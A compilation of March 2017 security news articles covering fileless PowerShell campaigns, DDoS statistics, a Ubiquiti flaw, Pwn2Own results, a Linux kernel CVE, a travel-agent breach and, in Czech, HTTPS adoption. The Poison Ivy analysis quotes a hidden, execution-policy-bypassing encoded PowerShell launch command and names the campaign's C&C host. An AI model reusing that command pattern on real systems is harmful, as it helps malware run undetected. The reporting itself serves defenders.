Another recently spotted fileless attack was installing a PowerShell backdoor dubbed POWERSOURCE onto infected computers, which FireEye linked to a threat group called FIN7. The actor has been targeting organizations in the United States, focusing on personnel that handle filings to the Securities and Exchange Commission (SEC).

According to Morphisec, all these attacks are actually linked to each other, and all had been leveraging the same fileless attack framework that the security company managed to access. In fact, the company says that the same threat group is responsible for all of the attacks.

“Based on our findings, a single group of threat actors is responsible for many of the most sophisticated attacks on financial institutions, government organizations and enterprises over the past few months,” the security researchers reveal. What Morphisec doesn’t say, however, is who these actors are.

The security researchers even had a brief encounter with these actors, “via the very same PowerShell protocol used for the attack delivery,” which revealed that the hacker was part of an organization targeting specific companies. Following the encounter, the cybercriminals shut down the C&C server, which might have resulted in the loss of foothold in the systems connected to that server.

Similar to previously described campaigns, the attack uses a weaponized Word document that delivers a PowerShell agent capable of opening a backdoor and establishing persistency. In most cases, the actors then move to delivering different PowerShell commands through the C&C, depending on the target.

“For some targets, the attack was fully fileless, eventually delivering a Meterpreter session directly to memory. In other cases, the password-stealer LaZagne Project or another Python executable was delivered and executed. After additional investigation, we identified controllers for different protocols including Cmd, Lazagne, Mimikatz and more,” Morphisec explains.

The malicious Word document claims to be protected and asks the potential victims to enable the content to view it, which allows the macros to run. The included PowerShell executes using Windows Management Instrumentation (WMI), a technique already adopted by various malware families to evade detection.

After several decryption stages, the decrypted PowerShell is saved to the disk. The script observed in one attack was found to be an agent capable of receiving commands from the C&C, execute them and return the results. The malware was also found to lower Office’s macro restrictions to allow for other macro-based documents to be automatically executed.

“In the course of our research the attacker briefly interacted with us. It was clear that a person from the other side was waiting to connect on his Meterpreter session. During the brief interaction, our researchers tried to identify the actor. The attackers immediately blocked the connection and later shut down the C&C server entirely, thereby losing their foothold in the systems of victims connected to that communication server,” Morphisec says.

The security researchers note that the fileless attacks are on the rise and could prove a bigger problem than currently believed. Because the malware resides solely in the memory and commands are delivered directly from the Internet, there is no executables on disk, making the attack basically invisible.


Network Layer DDoS Attacks Hit Record Levels: Imperva

17.3.2017 securityweek Attack
Distributed denial of service (DDoS) attacks continue to grow in size and sophistication, with network layer attacks reaching record levels in the fourth quarter of 2016, Imperva reports.

According to the company’s latest quarterly Global DDoS Threat Landscape Report, the emergence of powerful Internet of Things (IoT) botnets and the declining costs of DDoS-for-hire services are driving the increased threat of disruptive DDoS attacks. While network layer attacks grew in size, application layer incidents increased in frequency, the report reveals.

The largest DDoS attack mitigated by Imperva in Q4 2016 was a 650 Gbps (gigabit per second) assault fueled by the IoT botnet called Leet Botnet (in the previous quarter, Akamai dealt with a similar attack, which was fueled by the Mirai botnet). The last three months of 2016 also registered the longest network layer attack of the year, which lasted for 29 days.

During the last quarter of 2016, Imperva mitigated an average of 280 network layer attacks per week, totaling 3,603 and marking a 39.4% drop from the previous quarter. Most of the attacks were very short, with 89% of them lasting for less than one hour, the security company says.

Single-vector network attacks went up to a yearly high of 71%, while the percentage of assaults in which five or more different payloads were used dropped from 3.9% in Q3 to 1.9%.

“With respect to multi-vector attacks, the downward trend we’re seeing can likely be attributed to the increase in less-sophisticated assaults being instigated by non-professional perpetrators using botnet-for-hire services,” Imperva says.

In the October – December timeframe, Imperva mitigated 11,727 application layer attacks, for an average of 889 per week, a 2.9% increase from Q3 2016. The largest incident reached 91,209 RPS (requests per second), being significantly smaller compared to the annual high of 173,633 RPS registered in the prior three months. The longest attack lasted 47 days, but most attacks (74.7%) lasted less than an hour.

Attack frequency went up, with 58.3% of targets being hit multiple times, compared to 54.7% in Q3. Furthermore, 13.1% of sites were targeted more than ten times during the timeframe, “the highest figure ever recorded for this attack frequency category,” according to Imperva.

The quantity of sophisticated, browser-based bots that retain cookies and execute JavaScript rose to 13.6% in Q4, up from only 8.0% in Q3. “But primitive bots are still predominant and reflect the growing use of botnet-for-hire services. Over the past year, Incapsula has detected a noticeable correlation between the level of bot sophistication and attack duration,” the security firm notes.

When it comes to botnet activity in the timeframe, China emerged as the top attacking country at 78.5%, followed by Vietnam at 4.5%, and South Korea at 2.9%. The United States was the most targeted country at 56.7%, followed by the United Kingdom at 9.6% and the Netherlands at 8.6%. These numbers do not mean the actual threat actors behind the attacks are located in those countries.


Critical Flaw Exposes Many Ubiquiti Devices to Attacks

17.3.2017 securityweek Vulnerebility
Dozens of products from Ubiquiti Networks are affected by a critical flaw that can be exploited to hijack devices. The security hole was reported to the vendor in November, but patches have yet to be released for most of the impacted versions.

The vulnerability, discovered by researchers at SEC Consult, has been described as a command injection in the administration interface of Ubiquiti devices. The weakness affects the pingtest_action.cgi component and it’s partly caused by the use of a very old version of PHP, namely PHP 2.0.1 from 1997.

The flaw can be exploited by authenticated attackers from a low privileged read-only account, or remotely by unauthenticated hackers if they can trick a user into clicking on a specially crafted link. The remote attack works due to the lack of cross-site request forgery (CSRF) protection, SEC Consult said in its advisory.

An attacker can exploit the vulnerability to open a reverse root shell and take over the device. Depending on what the device is used for, it may also be possible for an attacker to hijack other machines on the network.

According to SEC Consult, the flaw affects roughly 40 Ubiquiti access points, including Rocket Prism, PowerBeam, NanoBeam, LiteBeam, airGateway and airFiber products.

The security firm reported the vulnerability to Ubiquiti Networks on November 22 via the vendor’s HackerOne page. The company was initially responsive, but it stopped providing status updates in early February, which led to SEC Consult’s decision to make its findings public.

SEC Consult has published a video demonstrating its findings, but only limited technical details have been made available to prevent abuse:

After SEC Consult published its advisory, an Ubiquiti employee responded to users on Reddit, claiming that the company stopped responding to the researchers due to a communications issue with the HackerOne platform.

The company said the vulnerability was fixed in version 8.0.1 of AirOS, the operating system running on affected products. It has also promised to release updates soon for versions 5.x, 6.x ad 7.x.

“Agree this looks very bad, but I can assure you the optics of this aren't an accurate reflection of how security issue reports are handled,” said the Ubiquiti employee. “We did drop the ball in communication here, but it wasn't due to the issue being ignored.”


New APT Campaign based on Poison Ivy RAT with C&C in China has been reversed by MalwareMustDie
17.3.2017 securityaffairs APT

New APT Campaign based on Poison Ivy RAT with C&C in China has been reversed by MalwareMustDie who shared a lot of interesting details about the attack vectors and reverse techniques.
Our travel along the great analysis of a fresh, new insidious APT China campaign.

An ordinary case of phishing?
At the beginning, it seemed always the same story: a Word document probably infected, an ordinary story of phishing and nothing more.

If we check at the top of the long analysis of MalwareMustDie we can see the pictures of an ordinary mail, with the boring, ordinary infected Office Word attachment, nothing new under the sun.

The strange fact was that the suspect document was on a common blog web site like Geocities delivering a multi-layered base64 encoded VBScript script which manually decoded at the first layer have given the resulted below:

Poison Ivy

Figure 1. The VBScript encoded with “powershell.exe” command.

The classical vbscript “createbject” instruction is followed by a Powershell command: “powershell.exe –w hdden –ep bypass –Enc with a long encoded string”

Poweshell? Encoded command? “Bypass” option used for what?

Something not so “ordinary nor boring” rises from the underground of the investigation and here the analysis of MalwarareMustDie starts to become interesting and surprising step after step.

Digging into the details of the functions decoded in the other layers of VBScript in a looping process revealed a complex source code fully executable by Powershell: and we have to admit that following MalwareMustDie in his analysis it’s like riding the roller coaster, the same enjoyment.

Here it is an example of the base 64 manually decoded code that revealed another nested base 64 encoded code. The functions represented in the picture are self-explaining as said in the analysis and it is clear that something dangerous is going on the victim computer.


Figure 2. The VBScript base 64 decoded code.

After different loops decoding base 64 layers the result is clear: beyond the Word attachment document, hidden in the VBScript file, there is a long and dangerous script ready to be executed by Powershell: but “where I have already seen this source code”?

“Copy/Pasting Powersploit/CodeExecution PoC”
The code in the VBScript running the Powershell command is a “copy pasta” of an infamous malware based on Powershell PowerSploit/CodeExecution PoC code which is publicly available on GitHub, same file, extension .ps1.

Here it is the main web page of the exploit with the documentation:

Poison Ivy

Figure 3. The PowerSploit / CodeExecution web page on GitHub.

The documentation of the exploit states: “Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process”. Easy: this is hacking pret-a-porter.

And here we have the first Lesson Learnt of this investigation: how big is the damage to the community of the users keeping the malware code publicly available on GitHub: we will not stress enough repeating how would be important not to have this source code ready to use.

The Shellcode analysis
But let give a look to the Shellcode, because the most important task now is reverse it and understand what is the main purpose of its use, why is injected on the computer victims, which technics and mechanisms adopted for doing what, connecting where. The story is getting exciting!

But again the Shellcode is encoded using base 64: when decoded it appears as reported in the picture below:

Poison Ivy

Figure 4. The Shellcode.

The reverse activity seems to be a long task and again – surprisingly – we discover a great trick from MalwareMustDie in order to compile the shellcode and have an executable file to run safely:

“Saving the shellcode data in the .textsection of the assembly file and the entry point(EP) will be “adjusted” by the compiler during compilation process therefore you can execute this shellcode as a binary PE file. This method is very useful when analysing shellcodes. And by using a Unix environment you can create this PE without risking an infection.”

We report the figure of the adopted process here:

Poison Ivy

Figure 5. How handle the shellcode to build up a useful .exe file

The result of this process is to have a “beautiful” stupid-shellcode.exe file ready to run in order to understand the behaviour for further investigations.

Running the malware discovered the behavior can be discovered: it extracts the information from the victim’s computer calling back its C2 server with the target to perform all the malicious actions. The analysis of the payload behavior has always fascinated and the security researchers can spend days “following the money”.

At the end it is sure we are fronting the famous – or infamous – Poison Ivy.

Poison Ivy Classical Scheme in the field
Running the Shellcode it is possible to observe that it uses a lot of system calls involving DLLs mostly related to the kernel of the system: and at the first stage of trace-assemby of the Shellcode provides a fake process named userint.exe used to inject the malicious code, that is executed in this way.

Here an image from the MalwareMustDie analysis reported above:

Poison Ivy

Figure 6. The fake process userinit.exe created and injected.

The great knowledge in malware by MalwareMustDie rise up in all his strength: he is able to find many elements that can be traced back to Poison Ivy.

The combination of the usage of certain DLL, he says, “is showing a typical pattern of the threat too. Moreover, the date stamped in the MUTEX name is mostly used by Poison Ivy“.

Then other operations are performed by the malware:

creating the file called “Plug1.dat”,
it mades a socket for the further works
querying PC info through “HKEY_LOCAL_MACHINE\SYSTEM\Setup”
Yes, no doubts that is Poison Ivy.

But, where is the C&C server?
The last answer to close the loop is: where is the Command and Control server located?

If we give a look closer to the WS2_32.DLL we see that there are some interesting calls like:

socket(),
gethostbyname()
connect().
These revealed hostname and IP address for the callback to the Command and Control server, which is based in Seul, Korea.

Poison Ivy

Figure 7. C&C server based in Korea.

Network/BGP Information→「61.97.243.15||4766 | 61.97.243.0/24 | KIXS-AS | KR | kisa.or.kr | KRNIC」

But looking to the hostname we see that is web.outlooksysm.net on which is possible to invoke a WHOIS command that gives back, among other info, who is the Registrar: is a company based in Shanghai.

Poison Ivy

Figure 8. Whois of the C&C server of the Poison Ivy malware.

Conclusion
The conclusion is that this APT campaign, which utilized multiple accounts on Geocities Japan, leading to the possibility that there is a larger APT campaign being conducted targeting Mongolian victim is

The information provided here is referred to the MalwareMustDie research and analysis linked above.

This kind of campaign has been renamed “Free Hosting (pivoted) APT PowerSploit Poison Ivy” (FHAPPI) by the gentleman who provided us the translation from the Japanese language, Mr. El Kentaro, making up very F-Happy to learn new methods and techniques.

Odisseus is an Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing, and development.


Who is spying on communications in the Washington area? A rogue state is suspected of mass surveillance
17.3.2017 securityaffairs BigBrothers

US authorities uncovered a surveillance activity allegedly powered by a rogue entity that is tracking phones of Government officials and foreign diplomats.
Something very strange has happened in the Washington, D.C., region, experts noticed an unusual amount of highly suspicious cellphone activity. The fear is that a rogue actor is attempting to spy on communications of numerous individuals, including US Government officials and foreign diplomats.

The news was reported by the Washington Free Beacon who viewed sensitive documents regarding the issue and interviewed security insiders. The level of sophistication of the attacks suggests the involvement of a foreign nation-state actor.

“The authorities observed a large spike in suspicious activity on a major U.S. cellular carrier has raised red flags in the Department of Homeland Security and prompted concerns that cellphones in the region are being tracked.” reads the article published by Free Beacon. “Such activity could allow pernicious actors to clone devices and other mobile equipment used by civilians and government insiders, according to information obtained by the Free Beacon.”

According to the Free Bacon, attackers siphoned a huge amount of location data from a U.S. cellular carrier allowing the control of several cell phone towers in the area.

surveillance

The activity was spotted by a program known as ESD Overwatch that monitors cell towers activities for anomalies, the software is supported by DHS and ESD America.

According to a report prepared by ESD Overwatch, a contractor working on behalf of DHS, the data gathered by the ESD Overwatch program shows the U.S. cell carrier has experienced “unlawful access to their network for the purpose of large scale subscriber tracking.”

“Cell phone information gathered by the program shows major anomalies in the D.C.-area indicating that a third-party is tracking en-masse a large number of cellphones. Such a tactic could be used to clone phones, introduce malware to facilitate spying, and track government phones being used by officials in the area.” continues the Free Bacon.

“The attack was first seen in D.C. but was later seen on other sensors across the USA,” according to one source familiar with the situation. “A sensor located close to the White House and another over near the Pentagon have been part of those that have seen this tracking.”

The threat actor is trying to identify and track cellphones when they connect cellphone towers. The DHS’s Office of Public Affairs confirmed that the ESD Overwatch program was used in a 90-day pilot program that began Jan. 18.

There is also another disconcerting aspect of the story, it this the first time a threat actor launched a similar surveillance campaign?

According to the Free Beacon, there is no reply to my answer, “before the [ESD Overwatch program] surveillance program was initiated the federal government did not have a method to detect intrusions of the nature seen over the past several months.”

An official with ESD Overwatch confirmed the existence of the DHS program.

The surveillance of US cellular communication has been a top concern in Congress, lawmakers petitioned DHS on Wednesday to have information on the countermeasures in place to prevent foreign threat actors from spying on communications.


Roste počet šifrovaných webů, HTTPS konečně nahrazuje HTTPS

17.3.2017 SecurityWorld Zabezpečení
Poté, co Edward Snowden odhalil světu, že online komunikace je hromadně sbírána a ukládána některými z nejmocnějších zpravodajských agentur světa, bezpečnostní experti začali volat po silnějším šifrováním na celém webu. Po čtyřech letech se zdá, že se jejich snaha vydařila.

Počet webových stránek podporujících HTTPS – tedy protokol http šifrovaný přes SSL/TSL připojení – se během posledního roku významně zvýšil. Spuštění šifrování přináší mnoho výhod, takže pokud vaše webová stránka ještě tuto technologie nepodporuje, je na čase to změnit.

Nedávná telemetrická data z Google Chromu a Mozilly Firefox ukazují, že přes 50 % přenášených webových dat je šifrováno, a to jak na počítačích, tak mobilních zařízeních. Je pravda, že většina provozu se týká několika největších webových stránek, přesto je skok o 10 procentních bodů za rok úctyhodný.

Úterní průzkum milionu nejnavštěvovanějších webových stránek světa prokázal, že 20 % z nich podporuje HTTPS oproti 14 % v srpnu. Jde tedy o značný, více než 40% nárůst během půl roku.

Existuje mnoho důvodů zrychleného osvojování HTTPS standardu. Některé z dřívějších překážek se nyní snáze překonává, ceny poklesly a zvýšilo se množství důvodů, proč na šifrování přejít.

Výkonnostní dopad

Jednou z dlouhodobých obav ohledně HTTPS je negativní dopad na serverové zdroje a načítací dobu stránek. Šifrování ostatně obvykle přináší rychlostní propad, proč by tedy HTTPS mělo být odlišné?

Jak se však ukazuje, díky vylepšením jak na straně serverů, tak u klientského softwaru je dopad TLS šifrování na rychlost webu zcela minimální.

Když Google začal v roce 2010 využít HTTPS u svého e-mailového klienta Gmailu, společnost odhalila pouze procentní nárůst zatížení procesorů na svých serverech, pod 10 Kb dodatečné paměťové zátěže na jedno připojení a celkově méně než 2 % síťové režie. Přechod na šifrování nevyžadoval žádné dodatečné stroje či specializovaný hardware.

Nejen, že je dopad na back end minimální, ale prohlížení webů je dokonce rychlejší, když je HTTPS zapnuto. Důvodem je, že moderní prohlížeče podporuje HTTP/2, revizi http protokolu, která přináší mnohá výkonnostní zlepšení.

Ačkoli šifrování není nutností pro oficiální specifikaci HTTP/2, tvůrci prohlížečů jej ve vlastní implementaci nutným učinili. Pokud tedy na svém webu chcete rychlostní zlepšení v podobě HTTP/2, šifrování je nutností.

Jde samozřejmě i o peníze

Cena získání a obnovení digitálních certifikátů nutných k nasazení a fungování HTTPS bylo v minulosti důvodem k obavám, a to spravedlivě. Mnoho malých podniků a nekomerčních subjektů se pro nasazení šifrování nerozhodlo pravděpodobně právě z tohoto důvodu, a i větší společnosti s mnoha webovými stránkami a doménami ve správě se mohli finančního dopadu obávat.

To by naštěstí nemusel být nadále problém, alespoň pro ty weby, které nevyžadují certifikáty Extended Validation EV. Nezisková organizace Let’s Encrypt minulý rok spustila certifikáty domain validation (DV), které navíc poskytuje zadarmo skrze plně automatizovaný a jednoduchý proces.

Z kryptografického a bezpečnostního hlediska není mezi DV a EV certifikáty žádný rozdíl. Jediný reálný rozdíl je v tom, že EV vyžaduje důkladnější verifikaci organizací a umožňuje držiteli certifikátu zobrazit jméno vlastníka v adresním řádku, kde vedle vizuálního indikátoru HTTPS připojení.

Mimo Let’s Encrypt existuje ještě několik síťových a cloudových poskytovatelů služby, včetně CloudFlare a Amazonu, které nabízí TLS certifikáty zdarma. Webové stránky hostované skrze službu Wordpress rovněž dostávají HTTPS automaticky, a to i pokud využívají vlastní doménu.

Noční můrou je špatná implementace

Nasazení HTTPS bývalo velmi složité. Kvůli špatné dokumentaci, pokračující podpory slabých algoritmů v kryptovacích knihovnách a neustále odhalovaných nových útocích byla vysoká šance, že serveroví administrátoři skončí se zranitelnou verzí HTTPS protokolu. A špatné HTTPS je horší než žádné, neboť uživatelům dává falešný pocit bezpečí.

Mnohé z těchto problémů se však řeší. Webové stránky typu Qualys SSL Labs poskytují dokumentaci zdarma k TLS, stejně jako testovací nástroje k nalezení chybné konfigurace a zranitelností v HTTPS verzi uživatele. Jiné webové stránky pak poskytují zdroje na optimalizaci výkonu TSL.

Smíšený obsah zůstává problémem

Posílání a vytahování externích zdrojů typu obrázky, videa a JavaScript kód skrze nezašifrovaná připojení do HTTPS webové stránky spustí bezpečnostní varování v prohlížečích uživatele. A protože mnoho webových stránek na externích zdrojích závisí – fóra, webová analytika, reklamy apod. – zůstává smíšený obsah jedním z důvodů, proč někteří vlastníci webových stránek stále ještě nepřestoupili na HTTPS.

Dobrá zpráva je, že v posledních letech se vyrojilo velké množství služeb třetí strany, včetně reklamních sítí, které začaly HTTPS podporovat. Důkazem, že problém přestává být tak významný jako dříve, svědčí například to, že mnoho online médii již na HTTPS přešlo, přestože takové stránky jsou obvykle na zdrojích z reklamy závislé. Přesto však někteří vlastníci nemají jinou možnost než u HTTP z finančních důvodů setrvat.

Webmasteři mohou využít CSP header, který jim odhalí nezabezpečené externí zdroje na jejich webových stránkách a mohou je kupříkladu zablokovat. http Strict Transport Security (HSTS) také může napomoci s potížemi smíšeného obsahu, jak vysvětluje například bezpečnostní analytik Scott Helme (anglicky).

Další možnosti zahrnují služby typu CloudFlare, fungující jako proxy mezi uživatelem a webovým serverem, který webovou stránku vlastně hostuje. CloudFlare zašifruje přenos dat mezi koncovými uživateli a svým proxy serverem, i v případě, že je spojení mezi proxy a hostujícími servery nezašifrované. Toto zabezpečení je sice jen polovinou komunikace mezi subjekty, přesto je však lepší než nic a částečně znemožní manipulaci s příchozím obsahem nebo jeho odposloucháváním.

HTTPS přidá na důvěryhodnosti

Jednou z klíčových výhod HTTPS je ochrana uživatelů před útoky typu man in the middle (MitM), které lze spustit ze špatně zabezpečených nebo nakažených sítí.

Hackeři používají tuto techniku ke krádeži citlivých informaci uživatele nebo k vložení škodlivého obsahu do přenášených dat. MitM útoky lze také provést i z vyšší pozice internetové infrastruktury, například na celonárodní úrovní – velký čínský firewall – případně i na kontinentální úrovni, jako v případě odposlouchávacích aktivit NSA.

Operátoři Wi-Fi hotspotů, a i někteří poskytovatelé internetového připojení, MitM techniky využívají ke vkládání reklam a různých zpráv do nezabezpečeného přenosu dat uživatele.

Nechcete HTTPS? Přijde penalizace

Google začal HTTPS preferovat u svých výsledků vyhledávání už v roce 2014; znamená to, že šifrované weby mají ve vyhledávání výhodu nad standardními HTTP stránkami. Důraz kladený na šifrování u výsledků je prozatím poměrně malý, v budoucnu jej však Google chce zvýraznit v rámci podpory HTTPS protokolu.

Za stejnou věc bojují i výrobci prohlížečů, avšak ještě o něco agresivněji. Nové verze Chromu a Firefoxu zobrazí varování, pokud se uživatelé pokusí vložit heslo či informace o kreditní kartě do textových polích mimo HTTPS stránky.

V Chromu mají dokonce nešifrované weby zákaz přístupu k některým funkcím typu geolokace, GPS zařízení nebo k mezipaměti. V budoucnu chce Google s Chromem zajít ještě dál a například zobrazovat „Nezabezpečené“ varování na adresním řádku pro všechny nezašifrované weby.

Budoucnost HTTPS

„Jako komunita cítím, že jsme vykonali hodně dobrého v této oblasti a vysvětlili jsme, proč by všichni měli využívat HTTPS,“ říká Ivan Ristic, bývalý šéf Qualys SSL Labs a autor knihy Bulletproof SSL a TSL. „Obzvláště prohlížeče se svými neustále vylepšeními jsou důležitým motivem k přechodu na HTTPS.“

Podle Ristice některé problémy zůstávají, například zastaralé systémy nebo služby třetí strany bez HTTPS podpory. Cítí však, že se situace zlepšuje i ze strany široké veřejnosti, která na osvojení HTTPS tlačí.

„Cítím že s tím, jak více stránek na šifrování přejde, bude vše jednodušší,“ říká.

Lidé mají při použití HTTPS webových stránek vyšší míru sebevědomí a důvěry. Certifikáty jsou však dnes snadno získatelné a mnoho útočníků využívá často nemístné důvěry uživatelů a zakládají čistě útočné HTTPS stránky.

„Pokud jde o otázku důvěry, jednou z věcí, kterou musím zdůraznit je, že HTTPS neznamená nic o spolehlivosti webové stránky ani o tom, kdo ji vlastní,“ říká bezpečnostní expert Troy Hunt.

Organizace se budou muset se zneužíváním HTTPS protokolu vyrovnat a začít na lokálních sítích prozkoumávat přenosy dat, protože šifrované spojení může skrývat nežádoucí malware.


Sony Is Working On Mobile-to-Mobile Wireless Charging Technology
17.3.2017 thehackernews IT

So you are in a party with your friends, and your phone is running low on battery. Oops!
The ideal solution is to charge your phone using a charger or a power bank, but not everyone carries power banks or chargers with them all the time, especially in a party.
What if you can charge your phone wirelessly using another phone when it runs out of battery?
Isn't that great? Well, thanks to Sony, you might soon be able to use your friends’ phones to charge your own device.
According to a recently published patent application, Sony is working on a new futuristic technique that enables wireless power exchange between various nearby consumer electronic devices, including smartphones, computers, microwave, washing machine, fridges, and TVs, without cords.
Wireless charging isn't a new concept at all, but this is the first time when the Near Field Communications (NFC) technology is being used for power transfer wirelessly between two devices, that too over considerable distances.
NFC is a technology that allows data transfer over a short-range, which is why two devices have to be placed nearby, under a certain distance, for the given wireless technology to work.
Titled "Configuration of Data and Power Transfer in Near Field Communications," the patent describes where any consumer electronic with NFC chip might be able to search for other devices with the similar technology and connect with them to transfer power, the same way a device searches for available Wi-Fi hotspots.
However, the patent doesn’t detail how well this technology would actually work and has no word over the distance for which this technology might work between two devices.
"The distances over which the wireless communication can be achieved is typically consistent with distances used for wireless electrical power transfer through the power transfer antenna," Sony's patent document reads.
The patent also does not specify that these devices would necessarily be smartphones or computers; instead, it uses the term "portable consumer electronic device," which could be a fridge, TV, computer, microwave, washing machine, and so on.
This technology could eliminate one of your worst pains of always carrying out bulky power banks and multiple charging cables, provided your friends or smart appliances are willing to share their battery power to charge your phone.
However, patenting an idea does not necessarily mean we will ever see the idea come to life, but if succeeded, your phone will automatically start charging while you walk into a room – Thanks to Smart TVs, microwaves and other devices with NFC-enabled.


Welcome to Pwn2Own 2017 – Researchers hacked Adobe Reader, Edge, Ubuntu, and Safari
17.3.2017 securityaffairs Congress

Pwn2Own 2017 is started, as usual, it is a great event to see hackers at work. In the first day, experts hacked Edge, Safari, Ubuntu, and Adobe Reader.
Pwn2Own 2017 competition held in Vancouver (Canada) is started, as usual, it is a great event to see hackers at work. In the first day Bug bounty hunters have managed to hack Microsoft Edge, Safari, Ubuntu, and Adobe Reader.

Pwn2Own 2017

This is the 10th anniversary of the Pwn2Own hacking contest, it was arranged by Trend Micro and the Zero Day Initiative (ZDI) that introduced new exploit categories.

11 Groups vie for a prize pool of $1 million, the products to hack are organized into five categories, virtual machine (VM) escapes, web browsers and plugins, local privilege escalation, enterprise applications, and server side.

On the first day, the participants earned a total of $233,000 to have disclosed exploits.

The day started with the success of a success the researcher @mj011sec from Chinese security firm Qihoo360 who earned $50,000 for hacking Adobe Reader on Windows and his team win 6 points towards Master of Pwn.

The hacker and his team exploited a jpeg2000 heap overflow in Adobe Reader, a Windows kernel info leak, and an RCE through an uninitialized buffer in the Windows kernel to take down Adobe Reader. In the process, they have earned themselves $50,000 USD and 6 points towards Master of Pwn.

Follow
Zero Day Initiative ✔ @thezdi
Boom! @mj0011sec uses 1 #Adobe and 2 #Windows bugs to take down #Reader & earn $50K. Next up is #Safari. http://bit.ly/2mJMrpl #P2O
7:53 PM - 15 Mar 2017
Photo published for Welcome to Pwn2Own 2017 - The Schedule
Welcome to Pwn2Own 2017 - The Schedule
Welcome to Pwn2Own 2017 - the tenth anniversary of the competition and our largest Pwn2Own ever. This is also our largest contest ever with over $1,000,000 USD up for the taking – and continuing what...
zerodayinitiative.com
22 22 Retweets 26 26 likes
Adobe Reader was also successfully hacked by components of the Team Sniper from Tencent Security. The hackers exploited use-after-free and information disclosure flaws to achieve code execution, and a use-after-free in the kernel to obtain SYSTEM-level permissions. The team earned $25,000 for its exploits and 6 Master of Pwn points.

Mid-morning researchers Samuel Groß (@5aelo) and Niklas Baumstark (_niklasb) partially hacked Apple Safari with an escalation to root on macOS. The duo used a use-after-free (UAF) in Safari combined with three logic bugs and a null pointer dereference to exploit Safari and elevate to root in macOS. They were prized with earn style points for displaying a special message on the targeted Mac’s touch bar, they earned $28,000 USD and 9 Master of Pwn points.macOS.

They were prized with earn style points for displaying a special message on the targeted Mac’s touch bar, they earned $28,000 USD and 9 Master of Pwn points.macOS.


Niklas Baumstark @_niklasb
First team to pwn Safari on macOS with escalation to root at #pwn2own! Was a ton of fun to pull that off with @5aelo
8:06 PM - 15 Mar 2017
112 112 Retweets 175 175 likes
In the afternoon the Chaitin Security Research Lab (@ChaitinTech) hacked Ubuntu Desktop exploiting a Linux kernel heap out-of-bound access, they earned $15,000 and 3 Master of Pwn points. This is the first time for an Ubuntu Linux hack at the Pwn2Own.

The same group reached another success at the end of the day hacking Apple Safari with an escalation to root on macOS.
The attack chained a total of six bugs, including an info disclosure in Safari, four different type confusions bugs in the browser, and a UAF in WindowServer. The team earned $35,000 and 11 points towards Master of Pwn.Master of Pwn.

The highest reward,$80,000, was assigned to the Tencent Security’s Team Ether for hack Microsoft’s Edge browser leveraging an arbitrary write bug in Chakra and a logic bug to escape the sandbox. The team of hackers earned $80,000 and 10 points for Master of Pwn.

Of course, there were also some failed attempts at the Pwn2Own 2017, the Tencent Security – Team Sniper (Keen Lab and PC Mgr) that targeted Google Chrome with a SYSTEM-level escalation were not able to complete their exploit chain within the allotted time.

The researchers Richard Zhu (fluorescence) targeting Apple Safari with an escalation to root on macOS did not complete the exploit chain within the allotted time too.did not complete the exploit chain within the allotted time too.

Team Ether had signed up to hack Windows as well, but they withdrew the entry as well as the researcher Ralf-Philipp Weinmann, who attempted the Edge hack.


CVE-2017-2636 Linux kernel flaw was spotted after seven years and quickly fixed
17.3.2017 securityaffairs Vulnerebility

A flaw recently fixed in the Linux kernel tracked as CVE-2017-2636 might have been exploited to gain privilege escalation or cause a DoS condition.
The security expert Alexander Popov from Positive Technologies has discovered a race condition in the n_hdlc driver that might be exploited by attackers for privilege escalation in the operating system.

Linux kernel CVE-2017-2636 flaw

The vulnerability tracked as CVE-2017-2636, received a CVSS v3 score of 7.8., it went uncovered for seven years but it is not possible to say if hackers have exploited it in the wild.

“This is an announcement of CVE-2017-2636, which is a race condition in the n_hdlc Linux kernel driver (drivers/tty/n_hdlc.c). It can be exploited to gain a local privilege escalation.” reads the security advisory published on SecList. “This driver provides HDLC serial line discipline and comes as a kernel module in many Linux distributions, which have CONFIG_N_HDLC=m in the kernel config. Exploiting the flaw in the vulnerable module n_hdlc does not require Microgate or SyncLink hardware. The module is automatically loaded if an unprivileged user opens a pseudoterminal and calls TIOCSETD ioctl for it setting N_HDLC line discipline.”

Tha attackers can automatically load the flawed module with just unprivileged user rights and without using any special hardware.

The CVE-2017-2636 vulnerability affects the majority of popular Linux distributions including Ubuntu, RHEL 6/7, Fedora, SUSE, and Debian.

Linux users can install latest security updates or manually disable the vulnerable module.

Popov explained that the vulnerability is widespread on Linux systems due to its age.

According to the expert, the vulnerability was introduced on June 22, 2009. It was spotted years later during system calls testing with the syzkaller fuzzer and it was reported to kernel.org along with a patch to solve it and a PoC exploit code.

The flaw was publicly disclosed on March 7, and development team behind the major distributions quickly released security updates.


Travel Agent Association Breach Highlights Supply Chain Threat

16.3.2017 securityweek Incindent

The Association of British Travel Agents (ABTA) today informed users of a breach that may have affected up to 43,000 customers.

In a statement, CEO Mark Tanzer explained that he "recently became aware of unauthorized access to the web server supporting abta.com by an external infiltrator exploiting a vulnerability." That would seem to rule out insider action -- the web server was hacked.

The incident apparently occurred on Feb. 27 on a web server "managed for ABTA through a third-party web developer and hosting company." This phrase is repeated three times throughout the statement as if trying to reassure customers that it was not ABTA's 'fault'. Legally, that doesn't work. ABTA is clearly the data controller in this instance, and the data controller retains responsibility regardless of any third-party data processor (that is, the web-hosting company). If any subsequent investigation finds lack of regulatory compliance contributing to this breach, it is ABTA that will be held liable.

This highlights a major problem for all businesses: how to adequately security audit the supply chain.

"As this breach highlights," comments Ross Brewer, VP and EMEA MD of LogRhythm, "companies need to be conscious of third parties they work with as they can end up being a chink in their armor that they aren't aware of. Unfortunately, it's not uncommon for suppliers or partners to fall short in terms of security, jeopardizing the security of large organizations like ABTA."

Tony Pepper, co-founder and CEO of Egress, makes the same point. "It's one thing to be confident that you're ticking all the right boxes, but it's another to assume that other businesses are being just as thorough." It is, adds Dave Hartley, Associate Director at MWR InfoSecurity, "a powerful example of the dangers of divesting security responsibilities to third party developers and hosting providers." You can divest responsibility, but you cannot easily divest liability.

ABTA has reported the incident to the UK's data protection regulator, the Information Commissioners Officer (and the police). It will be some time before any compliance decision is made by the ICO.

In the meantime, ABTA is playing down the severity of the incident.

"The majority of the data," says the statement, "related to email addresses and passwords for any ABTA Member or customer of an ABTA Member that had registered on abta.com. These passwords were encrypted – which means to the human eye it will look like a jumble of characters -- and so there is a very low exposure risk of identity theft or online fraud."

The key phrase here is 'these passwords were encrypted'. But it doesn't specify whether they were encrypted or hashed, nor what hash algorithm was used, nor whether the hashes were salted. All of these details play into how easily the passwords can be decrypted -- which may simply be too easily.

